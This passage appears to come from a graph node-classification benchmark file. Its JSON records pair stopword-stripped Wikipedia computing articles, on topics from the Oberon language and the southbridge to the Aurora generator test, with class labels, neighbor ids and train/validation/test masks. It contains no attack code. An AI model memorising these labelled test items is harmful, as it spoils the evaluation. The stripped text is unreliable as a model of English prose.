race must leave earth go mars among voyagers one woman bears burden guilt father contribution destruction civilization earth chapter arc continues story rhea arc reincarnations star leaf crew completion operation exodus earth resistance must survive long enough arrival mars reinforcements led general mckenzie consists three episodes earth chapter 1 earth chapter 2 earth chapter 3 new era concludes story earth chapter takes place 200 years later consists two episodes new era plot summary centuries war humans mme machines humans battle however many lives lost earth rendered terribly damaged unstable live shortly afterwards mankind began restore earth new race cyborgs called yumans begun live humans desire better future humanity linked one large computer network however conflict humans yumans shortly began considering far better human yumans began plot takeover humanity lives separated tightly packed arcologies built around world keeping minimal contact dealing internal problems like overpopulation young scientist named nova influenced revolutionary leader yumans genova develops plans bring humanity using tools acquired years awakens artificial intelligence destroy human life reprograming every computer earth gorn virus virus actually bit nova predicted due intent wiping humans yumans solar system entire system connected wars gorn able bring presence everywhere attempt achieve long-term goals gorn plans surprise catty foreseen disaster sets plan motion virus strikes yuman heart leads force seven women final battle man machine 1996 ova reimagining series replaced amorphous paranoids seemingly endless civil war west force east force solnoid armies unlike previous ovas somber apocalyptic tones revolution traditional sci-fi adventure story although still stresses tragedies wide-scale destruction caused war four episodes produced along one soundtrack album vocal collection starring main female cast singing various songs one remake disguised spies one original saga soundtracks plot tells struggle west force east force armies solnoids threatens escalate total destruction solnoid race sides search ultimate war weapon anti-matter gun happenstance however several troopers east force eluza rabby patty rumy west force lufy encounter conch outlawed solnoid anti-war organization trying spread peace among hostile parties discover war merely used insidious instrument balance one singular solnoid party rogue solnoid troopers unwittingly find fighting idea completely alien presents way stopping perpetuated madness 1988 omake animated mockumentary detailing behind-the-scenes look production gall force eternal story destruction first story arc characters drawn super deformed versions eternal story counterparts video maintained comedic tone opposed somewhat serious war story original video supposedly documenting ten little gall force released along scramble wars united states animeigo single vhs video titled super-deformed double feature strangely time released dvd gall force titles vhs release much-sought rare collector items shoot 'em released japan simply titled gall force family computer disk system hal laboratory november 19 1986 another shoot-em-up also developed hal released year titled gall force defense chaos msx followed gall force eternal story graphic adventure game msx2 1987 similarly ovas era studios aic artmic gall force features huge amount music performed voice actors involved series several soundtracks released film ova ova episode earth chapter case addition many music collections released featuring original songs performed aforementioned voice actors along various singles cd drama far soundtracks released films destruction stardust war soundtracks singles music collections gall force earth saga back school wars",
    "neighbors": [
      10931,
      2156,
      9006,
      11471
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8082,
    "label": 9,
    "text": "Oberon_(programming_language):oberon programming language oberon general-purpose programming language created 1986 niklaus wirth latest member wirthian family algol-like languages euler algol-w pascal modula modula-2 oberon result concentrated effort increase power modula-2 direct successor pascal simultaneously reduce complexity principal new feature concept type extension record types permits construction new data types basis existing ones relate deviating dogma strictly static data typing type extension wirth way inheritance reflecting viewpoint parent site oberon developed part implementation oberon operating system eth zurich switzerland name moon uranus oberon oberon still maintained wirth latest language change dated may 8 2016 oberon designed motto attributed albert einstein mind “ make things simple possible simpler. ” principal guideline concentrate features basic essential omit ephemeral issues another factor recognition growth complexity languages c++ ada contrast oberon emphasizes use library concept extending language enumeration subrange types present modula-2 removed similarly set types limited small sets integers number low-level facilities sharply reduced particularly type transfer functions eliminated elimination remaining potentially-unsafe facilities concludes essential step toward obtaining truly high-level language close type-checking even across modules strict index-checking run time null-pointer checking safe type extension concept largely allow programmer rely language rules alone intent strategy produce language easier learn simpler implement efficient oberon compilers viewed compact fast providing adequate code quality compared commercial compilers following features characterize oberon language oberon supports extension record types construction abstractions heterogeneous structures contrast later dialects—oberon-2 active oberon—the original oberon n't dispatch mechanism language feature rather programming technique design pattern gives great flexibility oop world oberon operating system two programming techniques used conjunction dispatch call method suite message handler technique table procedure variables defined global variable type declared extended module assigned back generic module extend generic type figure specific shape dynamic dispatch done via procedures figures module generic module technique consists replacing set methods single procedure discriminates among various methods extend generic type figure specific shape oberon operating system techniques used dynamic dispatch first one used known set methods second used new methods declared extension module example extension module rectangles implement new rotate procedure within figures module could called via message handler no-cost implementations oberon language oberon operating system found internet several ethz changes made first released specification object-oriented programming features added 'for loop reinstated instance result oberon-2 currently common implementation release called native oberon includes operating system directly boot pc class hardware .net implementation oberon addition minor .net-related extensions also developed ethz 1993 ethz spin company brought dialect oberon-2 market name oberon-l renamed component pascal 1997 oberon-2 compilers maintained eth include versions microsoft windows linux solaris classic mac os furthermore implementations various operating systems atari-tos amigaos oberon-2 lex scanner yacc parser stephen j bevan manchester university uk based one mössenböck wirth reference version 1.4 also oxford oberon-2 compiler also understands oberon-07 vishap oberon latter based josef templ oberon c transpiler called ofront turn based op2 compiler developed regis crelier ethz oberon-07 defined niklaus wirth 2007 revised 2011 2013 2014 2015 2016 based original version oberon rather oberon-2 main changes explicit numeric conversion functions e.g floor flt must used loop exit statements eliminated statements extended case statements used type extension tests return statements connected end function imported variables structured value parameters read-only arrays assigned without using copy full details see programming language oberon-07 oberon-07 compilers developed use several different computer systems wirth compiler targets risc processor design used implement 2013 version project oberon operating system xilinx fpga spartan-3 board ports risc processor fpga spartan-6 spartan-7 artix-7 risc emulator windows compilable linux os x well binaries available windows also exist obnc compiles via c used posix compatible operating system commercial astrobe implementation targets 32-bit arm cortex-m3 m4 m7 microcontrollers patchouli compiler produces 64-bit windows binaries oberon-07m produces 32-bit windows binaries implements revision 2008 language akron produces binaries windows linux oberonjs translates oberon javascript oberonc implementation java virtual machine active oberon yet another variant oberon adds objects object-centered access protection local activity control system-guarded assertions preemptive priority scheduling changed syntax methods type-bound procedures oberon world objects may active means may threads processes additionally active oberon way implement operators including overloading advanced syntax using arrays see oberonx language extensions proceedings 7th joint modular languages conference 2006 oxford uk knows namespaces see proposal module contexts operating system a2 bluebottle especially kernel synchronizes coordinates different active objects ethz released active oberon supports active objects bluebottle operating system environment jdk http ftp etc language many prior designs ethz versions available download internet written single dual x86 cpus strongarm family supported development continued languages family extension oberon-2 originally named oberon/l later renamed component pascal developed windows classic mac os oberon microsystems commercial company spin-off ethz .net queensland university technology addition lagoona obliq languages carry oberon spirit specialized areas recent .net development efforts ethz focused new language called zonnon includes features oberon restores pascal enumerated types built-in io syntactic differences additional features include support active objects operator overloading exception handling zonnon available plug-in language microsoft visual studio .net development environment oberon-v originally called seneca seneca younger descendant oberon designed numerical applications supercomputers especially vector pipelined architectures includes array constructors statement see seneca language numerical applications vectorcomputers proc conpar 90 vapp iv conf r. griesemer diss nr 10277 eth zurich",
    "neighbors": [
      512,
      1145,
      9345,
      3462,
      8582,
      6797,
      6414,
      8973,
      6160,
      8720,
      6675,
      9107,
      10387,
      11411,
      5783,
      1435,
      8219,
      3613,
      6558,
      5663,
      7326,
      9245,
      3876,
      4777,
      428,
      5677,
      9008,
      5684,
      10548,
      823,
      7479,
      6074,
      6718,
      8510,
      576,
      963,
      6979,
      8644,
      8262,
      1480,
      5833,
      8524,
      7889,
      11219,
      5588,
      2519,
      477,
      11102,
      7775,
      4069,
      6502,
      10470,
      8554,
      10991,
      5872,
      2290,
      499,
      10739,
      3573,
      4341,
      3960,
      3705,
      7292,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8083,
    "label": 2,
    "text": "Nokia_C5-00:nokia c5-00 nokia c5-00 first new cseries nokia phones announced march 2010 c5-00 smartphone messaging social networking features including example facebook flickr applications c5-00 allows multitasking display 3.2-megapixel camera c5-00.2 5 mp also includes gps free navigation courtesy ovi maps runs symbian os s60 3rd edition feature pack 2 microsd slot support 16-gigabyte cards c5-00.2 32 gb – nokia c5 comes two-gigabyte card box device dimensions thin across high battery life good 12 hours talk time gsm working memory ram 128 mb c5-00.2 256 mb available white warm grey nokia c5-00 made globally available second quarter 2010 c5-00 comes monoblock form factor weighs battery 5-way navi-key two soft keys separate call end clear application keys well volume keys side phone user interface ring tones customized announced maximum talk time varies 4.9 hours 3g networks 12 hours plain gsm networks maximum standby times 630 670 hours respectively music played maximum 34 hours phone offline mode phone features bluetooth connectivity 3.5 mm av connector stereo fm radio act data modem supports calendar contact synchronization microsoft outlook charged via usb conference calls three participants also made nokia c5-00 also features integrated web browser supports xhtml markup language flash lite 3.0 video streaming rss feeds camera back flash announced operating range 1.5 meters camera different capture colour tone scene white balance modes horizontal orientation also photo editor device video captured long memory available device also features secondary vga resolution camera video calls nokia c5-00.2 2011 comes 5-megapixel camera 256 mb ram support 32-gigabyte cards",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      2345,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 8084,
    "label": 8,
    "text": "ShiftSpace:shiftspace shiftspace discontinued open-source metaweb web annotation application framework allows altering web pages different tools tagline application open source layer web page implemented userscript greasemonkey extension firefox development shiftspace ceased 2011 shiftspace user viewing webpage least one shift notice small shiftspace notifier icon bottom left corner browser window pressing shift space keys user invokes meta layer particular page additional user-created content becomes visible shiftspace user invoke meta layer web page browse create additional interpretations contextualizations interventions called shifts available tools authoring shifts called spaces currently included core release notes highlights imageswap sourceshift spaces utilitarian like notes highlights interventionist like imageswap sourceshift shiftspace founded 2006 dan phiffer mushon zer-aviv students nyu interactive telecommunications program later year received prixars honorary mention next idea category ars electronica center shiftspace covered techcrunch cnet shiftspace supported grant swiss confederation commission rhizome.org",
    "neighbors": [
      546,
      803,
      8644,
      3462,
      5612,
      7983,
      5078,
      119,
      2298
    ],
    "mask": "Test"
  },
  {
    "node_id": 8085,
    "label": 1,
    "text": "Data_curation:data curation data curation organization integration data collected various sources involves annotation publication presentation data value data maintained time data remains available reuse preservation data curation includes processes needed principled controlled data creation maintenance management together capacity add value data science data curation may indicate process extraction important information scientific texts research articles experts converted electronic format entry biological database modern era big data curation data become prominent particularly software processing high volume complex data systems term also used historical uses humanities increasing cultural scholarly data digital humanities projects requires expertise analytical practices data curation broad terms curation means range activities processes done create manage maintain validate component specifically data curation attempt determine information worth saving long user rather database typically initiates data curation maintains metadata according university illinois graduate school library information science data curation active on-going management data lifecycle interest usefulness scholarship science education curation activities enable data discovery retrieval maintain quality add value provide re-use time data curation workflow distinct data quality management data protection lifecycle management data movement census data available tabulated punch card form since early 20th century electronic since 1960s inter-university consortium political social research icpsr web site marks 1962 date first survey data archive deep background data libraries appeared 1982 issue illinois journal library trends historical background data archive movement see social scientific information needs numeric data evolution international data archive infrastructure exact curation process undertaken within organisation depends volume data much noise data contains expected future use data means dissemination crises space data led 1999 creation open archival information system oais model stewarded consultative committee space data systems ccsds formed 1982 term data curation sometimes used context biological databases specific biological information firstly obtained range research articles stored within specific category database instance information anti-depressant drugs obtained various sources checking whether available database saved drug database anti-depressive category enterprises also utilizing data curation within operational strategic processes ensure data quality accuracy dissemination information packages dips information reuse dipir project studying research data produced used quantitative social scientists archaeologists zoologists intended audience researchers use secondary data digital curators digital repository managers data center staff others collect manage store digital information protein data bank established 1971 brookhaven national laboratory grown global project database three-dimensional structural data proteins large biological molecules pdb contains 120,000 structures standardized validated experimental data annotated flybase primary repository genetic molecular data insect family drosophilidae dates back 1992 flybase annotates entire drosophila melanogaster genome linguistic data consortium data repository linguistic data dating back 1992 sloan digital sky survey began surveying night sky 2000 computer scientist jim gray working data architecture sdss championed idea data curation sciences datanet research program u.s. national science foundation office cyberinfrastructure funding data management projects sciences dataone data observation network earth one projects funded datanet helping environmental science community preserve share data",
    "neighbors": [
      2818,
      5319,
      3880,
      1161,
      522,
      6131,
      8405,
      10102
    ],
    "mask": "Test"
  },
  {
    "node_id": 8086,
    "label": 4,
    "text": "CUPS_(CMU):cups cmu carnegie mellon university usable privacy security laboratory cups established spring 2004 bring together carnegie mellon university researchers working diverse set projects related understanding improving usability privacy security software systems privacy security research community become increasingly aware usability problems severely impact effectiveness mechanisms designed provide security privacy software systems indeed one four grand research challenges information security assurance identified computing research association 2003 give end-users security controls understand privacy control dynamic pervasive computing environments future challenge cups strives address cups affiliated carnegie mellon cylab members engineering public policy department school computer science electrical computer engineering department heinz college department social decision sciences",
    "neighbors": [
      10928,
      4213
    ],
    "mask": "None"
  },
  {
    "node_id": 8087,
    "label": 0,
    "text": "Morphological_pattern:morphological pattern morphological pattern set associations and/or operations build various forms lexeme possibly inflection agglutination compounding derivation term used domain lexicons morphology important distinguish paradigm lexeme morphological pattern context inflecting language inflectional morphological pattern explicit list inflected forms morphological pattern usually references prototypical class inflectional forms e.g ring per sing contrast paradigm lexeme explicit list inflected forms given lexeme e.g ring rang rung said terms difference description intension morphological pattern description extension paradigm",
    "neighbors": [
      11056
    ],
    "mask": "Train"
  },
  {
    "node_id": 8088,
    "label": 9,
    "text": "PhoX:phox automated theorem proving phox proof assistant based higher-order logic extensible user gives phox initial goal guides subgoals evidence prove goal internally constructs natural deduction trees previously proven formula become rule later proofs phox originally designed implemented christophe raffalli ocaml programming language continued lead current development team joint effort university savoy primary aim phox project creating user friendly proof checker using type system developed jean-louis krivine university paris vii meant intuitive systems remaining extensible efficient expressive compared systems proof-building syntax simplified closer natural language features include gui-driven proof construction rendering formatted output proof correctness programs ml programming language phox currently used teach logic savoy university experimental usable state released cecill 2.0",
    "neighbors": [
      7386,
      8262,
      4791
    ],
    "mask": "None"
  },
  {
    "node_id": 8089,
    "label": 3,
    "text": "Hardware_architect:hardware architect hardware systems architect hardware architect responsible large systems architecture developed way handle systems large one person conceive let alone design systems size rapidly becoming norm architectural approaches architects increasingly needed solve problems large systems engineers group reputation understanding responding human needs comfortably developing humanly functional aesthetically pleasing products architects expected understand human needs develop humanly functional aesthetically pleasing products good architect translator user/sponsor engineers—and even among engineers different specialties good architect also principal keeper user vision end product—and process deriving requirements implementing vision determining users/sponsors actually want rather say want engineering—it art architect follow exact procedure s/he communicates users/sponsors highly interactive way—together extract true requirements necessary engineered system hardware architect must remain constantly communication end users systems architect therefore architect must familiar user environment problem engineer need knowledgeable potential engineering solution space user/sponsor view architect user representative provide input architect direct interaction project engineers generally discouraged chance mutual misunderstanding high user requirements specification joint product user hardware architect systems hardware architects user brings needs wish list architect brings knowledge likely prove doable within cost time constraints user needs translated set high level requirements also best time write first version acceptance test thereafter religiously kept date requirements way user absolutely clear s/he getting also safeguard untestable requirements misunderstandings requirements creep development first level hardware engineering requirements purely analytical exercise also involve hardware architect engineer compromises made—to meet constraints like cost schedule power space architect must ensure final product overall look feel stray far user intent engineer focus developing design optimizes constraints ensures workable reliable product architect primarily concerned comfort usability product engineer primarily concerned producibility utility product provision needed services user true function engineered system however systems become ever larger complex emphases move away simple hardware components narrow application traditional hardware development principles found insufficient—the application general principles hardware architecture design sub systems seen needed hardware architecture also simplified model finished end product—its primary function define hardware components relationships whole seen consistent complete correct representation user mind—especially computer–human interface also used ensure components fit together relate desired way necessary distinguish architecture user world engineered hardware architecture former represents addresses problems solutions user world principally captured computer–human interfaces chi engineered system engineered system represents engineering solutions—how engineer proposes develop and/or select combine components technical infrastructure support chi absence architect unfortunate tendency confuse two architectures since engineer thinks terms hardware user may thinking terms solving problem getting people point point b reasonable amount time reasonable expenditure energy getting needed information customers staff hardware architect expected combine knowledge architecture user world potentially useful hardware engineering architectures former joint activity user latter joint activity engineers product set high level requirements reflecting user requirements used engineers develop hardware systems design requirements requirements evolve course project especially long one architect needed hardware system accepted user architect best insurance changes interpretations made course development compromise user viewpoint hardware engineers specialists know applications hardware design development intimately apply knowledge practical situations—that solve real world problems evaluate cost–benefits various solutions within hardware specialty ensure correct operation whatever design hardware architects generalists expected experts one hardware technology approach expected knowledgeable many able judge applicability specific situations also apply knowledge practical situations evaluate cost/benefits various solutions using different hardware technologies example specially developed versus commercially available hardware components assure system whole performs according user expectations many commercial-off-the-shelf already developed hardware components may selected independently according constraints cost response throughput etc cases architect already assemble end system unaided s/he may still need help hardware engineer select components design build special purpose function architects engineers may also enlist aid specialists—in safety security communications special purpose hardware graphics human factors test evaluation quality control rma interface management etc effective hardware architectural team must immediate access specialists critical specialties architect planning building works overall design making sure pleasing useful inhabitants single architect may enough build single-family house many engineers may needed addition solve detailed problems arise novel high-rise building designed job large complex enough parts architecture may designed components building housing complex may one architect complex one type building part architectural team large hardware systems also require architect much engineering talent engineered system large complex enough chief hardware systems architect may defer subordinate architects parts job although may members joint architectural team architect must never viewed engineering supervisor architect sub-allocate hardware requirements major components subsystems within scope single hardware engineer engineering manager subordinate architect ideally hardware component/subsystem sufficiently stand-alone object tested complete component separate whole using simple testbed supply simulated inputs record outputs necessary know air traffic control system works order design build data management subsystem necessary know constraints subsystem expected operate good architect ensures system however complex built upon relatively simple clean concepts sub system layer—easily understandable everyone especially user without special training architect use minimum rules ensure partition well-defined clean kludges work-arounds short-cuts confusing detail exceptions user needs evolve system fielded use lot easier subsequently evolve simple concept one laden exceptions special cases lots fine print layering hardware architecture important keeping sufficiently simple layer remains comprehensible single mind layers ascended whole systems lower layers become simple components higher layers may disappear altogether highest layers acceptance test always remains principal responsibility architect chief means architect prove user hardware originally planned subordinate architects engineers met objectives large projects tend dynamic changes along way needed user e.g. problems change expected user e.g. cost schedule reasons acceptance tests must kept current times principal means user kept informed final product perform act principal goal towards subordinate personnel must design build test building architect uses sketches models drawings hardware systems architect use sketches models prototypes discuss different solutions results user system architect engineers subordinate architects early draft version user manual invaluable especially conjunction prototype set engineering requirements means communicating users explicitly avoided well written set requirements specification intelligible engineering fraternity much legal contract lawyers",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 8090,
    "label": 3,
    "text": "Southbridge_(computing):southbridge computing southbridge one two chips core logic chipset personal computer pc motherboard northbridge southbridge typically implements slower capabilities motherboard northbridge/southbridge chipset computer architecture systems intel chipsets southbridge named i/o controller hub ich amd named southbridge fusion controller hub fch since introduction fusion amd accelerated processing unit apu southbridge usually distinguished northbridge directly connected cpu rather northbridge ties southbridge cpu use controller integrated channel circuitry northbridge directly link signals i/o units cpu data control access due push system-on-chip soc processors modern devices increasingly northbridge integrated cpu die examples intel sandy bridge amd fusion processors released 2011 southbridge became redundant replaced platform controller hub pch architecture introduced intel 5 series chipset 2008 southbridge features remaining i/o functions managed pch directly connected cpu via direct media interface dmi southbridge chipset handled computer i/o functions usb audio serial system bios isa bus interrupt controller ide channels different combinations southbridge northbridge chips possible two kinds chips must designed work together industry-wide standard interoperability different core logic chipset designs traditionally interface northbridge southbridge pci bus main bridging interfaces used dmi intel umi amd name derived representing architecture fashion map first described introduction pci local bus architecture 1991 intel authors pci specification viewed pci local bus centre pc platform architecture i.e. equator northbridge extends north pci bus backbone support cpu memory/cache performance-critical capabilities likewise southbridge extends south pci bus backbone bridges less performance-critical i/o capabilities disk interface audio etc cpu located top map due north cpu connected chipset via fast bridge northbridge located north system devices drawn northbridge connected rest chipset via slow bridge southbridge located south system devices drawn although current pc platform architecture replaced pci bus backbone faster i/o backbones bridge naming convention remains functionality found contemporary southbridge includes optionally southbridge also includes support ethernet raid usb audio codec firewire support provided non-usb keyboard mouse serial ports machine normally device referred super i/o still rarely southbridge may directly support keyboard mouse serial ports",
    "neighbors": [
      3586,
      9092,
      6806,
      8730,
      1563,
      2719,
      1058,
      8625,
      8629,
      2635,
      1614,
      7247,
      3537,
      5073,
      2523,
      2525,
      1376,
      8035,
      8931,
      2791,
      1515,
      10734,
      7151,
      1776,
      7538,
      5368
    ],
    "mask": "None"
  },
  {
    "node_id": 8091,
    "label": 7,
    "text": "Joint_Battlespace_Infosphere:joint battlespace infosphere joint battlespace infosphere project funded afrl air force research lab intended provide management network-centric warfare systems utilize gig global information grid",
    "neighbors": [
      7388
    ],
    "mask": "None"
  },
  {
    "node_id": 8092,
    "label": 2,
    "text": "Operating_system_advocacy:operating system advocacy operating system advocacy practice attempting increase awareness improve perception computer operating system motivation behind may increase number users system assert superiority one choice another brand loyalty pride operating system abilities open source operating systems political philosophical reasons persuade software vendors port specific applications device drivers computing platform generally done support increasing network effects platform operating system advocacy vary widely tone form seriously studied researched comparisons heated debates mailing lists forums advocates often normal users devote spare time advocacy operating system choice many deep abiding interest use design construction operating systems emotional investment favorite operating system one specific example known platform evangelism operating system advocacy compared advocacy fields particularly browser editor wars programming languages video game consoles well ford vs. chevy similar debates car culture due often emotional nature advocacy debate sometimes narrow appeal wider user population forums discussion advocacy often separate general discussion usenet comp.os comp.sys hierarchy often *.advocacy groups devoted exclusively advocating respective operating systems groups comp.sys.amiga.advocacy remain active even subject os ceases market force guide windows newsgroups exhorts usenet posters get involved arguments windows vs. os/2 vs. macintosh vs. nextstep except comp.os.ms-windows.advocacy group operating system advocacy discussions usenet elsewhere spawned variety jargon describing commonly seen behaviour including microdroid amiga persecution complex emotional form negative characteristics often associated operating system advocacy led create guidelines explaining consider positive advocacy linux advocacy guidelines guidelines effective os/2 advocacy freebsd served mailing list specifically advocacy discussion advocacy-related materials links provided freebsd website including page logos large number linux distributions many organizations involved linux advocacy including companies directly involved development distributions well purely advocacy-based groups seul promotion takes wide variety forms tux plush toys t-shirts posters even unorthodox forms body paints video games 1984 super bowl advertisement test drive macintosh apple switch get mac advertising campaigns apple computer long history advocating platform traditional media also covers advocacy macintosh hardware peripherals even lifestyle choices fans company projecting alternately hip entertaining liberating lifestyle negatively portraying microsoft windows ibm competitors anything awkward dated totalitarian sinister big brother figure neowin.net wrote editorials opposing windows-bashing media microsoft attempted boost popularity windows 7 launch party program like freebsd netbsd foundation hosts mailing list especially advocacy mailing list automatically archived made accessible online also provide official advocacy material posters flyers official powered logo license permitting use product running netbsd like freebsd netbsd openbsd project provides mailing list specifically intended advocacy advocacy openbsd.org created july 21 1998 discussion user groups stickers shirts promotion openbsd image also host flame-worthy discussions part advocacy project also maintains list consulting firms individual consultants around world website produced number slogans including free functional secure secure default power security flexibility openbsd release features original song variety artwork team os/2 grassroots organization conceived ibm employee initially joined ibmers quickly spread outside ibm whether ibm employees team os/2 members initially volunteered time passion without official sanction connection ibm members would promote os/2 trade shows conferences fairs stores participate operating system discussions compuserve prodigy fidonet usenet throw parties help users install os/2 contact media figures explain os/2 generate interest general exercise creativity initiative helping popularize os/2 industry dynamics gave rise passionate advocacy multi-faceted perhaps leading cause antipathy idea microsoft could would establish monopoly windows dos widely deemed far inferior os/2 additionally many users feared ibm proven eminently capable developing superior pc operating system knew little consumer marketing high-tech marketplace establishing even superior product standard cut-throat get-there-first-at-any-cost arena dominated microsoft finally mere fact many copies windows shipping users os/2 advocates viewed uncritical uninformed coupled fact many industry much riding success os/2 created conditions ripe many trying take matters hands spark needed combustible situation ignite example evangelism provided new ibm employees took empowerment seriously able coordinate efforts participation teamos2 forum internal ibm discussion group passionate supporters outside ibm adopted ideas modeled behaviors early activists within ibm",
    "neighbors": [
      2560,
      6155,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      7217,
      10803,
      2614,
      10809,
      576,
      2625,
      8262,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      9835,
      7285,
      4727,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      6296,
      2201,
      9370,
      9882,
      9887,
      8879,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      5840,
      7382,
      5335,
      8410,
      9436,
      1247,
      1761,
      11489,
      4841,
      4331,
      7403,
      242,
      5363,
      9466,
      3323,
      9468,
      1278,
      1804,
      273,
      8977,
      787,
      789,
      3350,
      5397,
      10016,
      7970,
      292,
      10235,
      2345,
      7470,
      7983,
      2355,
      7477,
      823,
      4409,
      314,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      7507,
      7511,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      5526,
      11675,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      9646,
      11184,
      7601,
      10676,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 8093,
    "label": 4,
    "text": "Feedback_loop_(email):feedback loop email feedback loop fbl sometimes called complaint feedback loop inter-organizational form feedback mailbox provider mp forwards complaints originating users sender organizations mps receive users complaints placing report spam buttons webmail pages email client via help desks message sender organization often email service provider come agreement mp want collect users complaints feedback loops one ways reporting spam whether provide fbl choice mp end users report abuse mailbox provider reporting hub also help filtering alternative competent users may send abuse complaints directly acting mailbox providers marketers striving mail delivered twofold advantage remove subscribers n't want receive kind advertising listwashing analyze complaint rate hence advertising meets market expectations unsubscribing users complain marketers reduce overall complaint rate per ip domain ensuring targeted mail much likely reach subscribers actually want receive esps playing sender role sensitive sending mail behalf customers may affect reputation monitoring complaint rate one ways control users sending weakness fbl relative asynchrony produce glitches possibly large time interval sits esp subscription fbl recipient clicking junk button interval click actual deletion recipient name list much shorter may noteworthy case huge mailbox providers gmail aol bulk messages provide information unsubscribe directly header fields codice_1 codice_2 besides providing direct better way unsubscribe also allows tell apart unsubscription junk reporting example one report message posted discussion list junk staying subscribed sketched process implies spencer besides author sender message connected postmaster responsible mail domain subscribing fbl usually involves postmaster authorization fbl subscriber may may forward abuse reports relevant authors subscribers exist given mail domain isaac omit sending abuse report fact subscriptions done one one laborious task mail domains engaged mass mailing may want skip addresses latter shortcoming proposing auto-subscribe just-in-time fbls started sending unsolicited abuse report directives minimum way unsubscribe ipsos noted majority respondents survey spam reporting marked messages spam based solely subject sender data years end users told trust email unsubscribe links many users hit spam button alternative unsubscribing consequently report spam may act unsubscribe cases one reasons hit unsubscribe links avoid confirming message received opened abuse reporting format arf standard format fbl reports much like bounce messages whose design inherited arf abuse report consists human readable part followed machine readable part original message report characterized feedback-type field whose values may indicate one abuse fraud virus types registered iana microsoft use name junk mail reporting jmr also use format google gmail beta testing non-traditional fbl select esps gmail uses format—an aggregate report reveals spam rate per notable sender sendgrid reports gmail fbl developed launched julian tempelsman sri somanchi effective identifying spam anti-spam systems miss",
    "neighbors": [
      8224,
      1667,
      488,
      3145,
      6762,
      1899,
      8202,
      7949,
      8747,
      914,
      10578,
      5012,
      6261,
      1495
    ],
    "mask": "None"
  },
  {
    "node_id": 8094,
    "label": 4,
    "text": "Attack_surface:attack surface attack surface software environment sum different points attack vectors unauthorized user attacker try enter data extract data environment keeping attack surface small possible basic security measure examples attack vectors include user input fields protocols interfaces services due increase countless potential vulnerable points enterprise increasing advantage hackers attackers need find one vulnerable point succeed attack three steps towards understanding visualizing attack surface step 1 visualize visualize system enterprise first step mapping devices paths networks step 2 find indicators exposures second step correspond indicator vulnerability potentially exposed visualized map last step one ioe missing security controls systems software step 3 find indicators compromise indicator attack already succeeded one approach improving information security reduce attack surface system software basic strategies attack surface reduction include following reduce amount code running reduce entry points available untrusted users eliminate services requested relatively users less code available unauthorized actors tend fewer failures turning unnecessary functionality fewer security risks although attack surface reduction helps prevent security failures mitigate amount damage attacker could inflict vulnerability found",
    "neighbors": [
      5636,
      6917,
      11022,
      4755,
      10776,
      2084,
      9642,
      10412,
      11188,
      3643,
      11198,
      9791,
      9160,
      6614,
      4439,
      7264,
      4074,
      2027,
      9964,
      5872,
      5373,
      2558,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 8095,
    "label": 4,
    "text": "Aurora_Generator_Test:aurora generator test idaho national laboratory ran aurora generator test 2007 demonstrate cyberattack could destroy physical components electric grid experiment used computer program rapidly open close diesel generator circuit breakers phase rest grid cause explode vulnerability referred aurora vulnerability vulnerability especially concern much grid equipment supports using modbus legacy communications protocols designed without security mind n't support authentication confidentiality replay protection means attacker communicate device control use aurora vulnerability destroy prepare experiment researchers procured installed 2.25 mw generator connected substation also needed access programmable digital relay another device controls breaker access could mechanical digital interface experiment researchers used cyberattack open close breakers sync maximize stress time breakers closed torque synchronization caused generator bounce shake eventually causing parts generator ripped apart sent flying parts generator landed far 80 feet away generator unit destroyed roughly three minutes however researchers assessed damage iteration attack real attack could destroyed unit much quickly experiment designated unclassified official use september 27 2007 cnn published article based information video dhs released july 3 2014 dhs released many documents related experiment part unrelated foia request aurora vulnerability caused out-of-sync closing protective relays close imperfect analogy would imagine effect shifting car reverse driven highway effect revving engine car neutral shifting drive aurora attack designed open circuit breaker wait system generator slip synchronism reclose breaker protection system recognizes responds attack ... traditional generator protection elements typically actuate block reclosing 15 cycles many variables affect time every system needs analyzed determine specific vulnerability aurora attack ... although main focus aurora attack potential 15-cycle window opportunity immediately target breaker opened overriding issue fast generator moves away system synchronism failure even single generator could cause widespread outages possibly cascading failure entire power grid occurred northeast blackout 2003 additionally even outages removal single component n-1 resilience large window second attack failure could take year replace destroyed generator many generators transformers custom-built aurora vulnerability mitigated preventing out-of-phase opening closing breakers suggested methods include adding functionality protective relays ensure synchronism adding time delay closing breakers one mitigation technique add synchronism-check function protective relays potentially connect two systems together implement function must prevent relay closing unless voltage frequency within pre-set range devices ieee 25 sync check relay well ieee 46,47,50 53 used prevent out-of-phase opening closing breakers discussion whether aurora hardware mitigation devices hmd cause failures may 2011 quanta technology published article used rtds real time digital simulator testing examine performance multiple commercial relay devices available aurora hmds quote relays subject different test categories find performance dependable need operate secure response typical power system transients faults power swing load switching ... general technical shortcomings protection scheme ’ design identified documented using real time testing results rtds testing showed yet single solution widely applied case present required reliability level presentation quanta technology dominion succinctly stated reliability assessment hmds dependable secure joe weiss 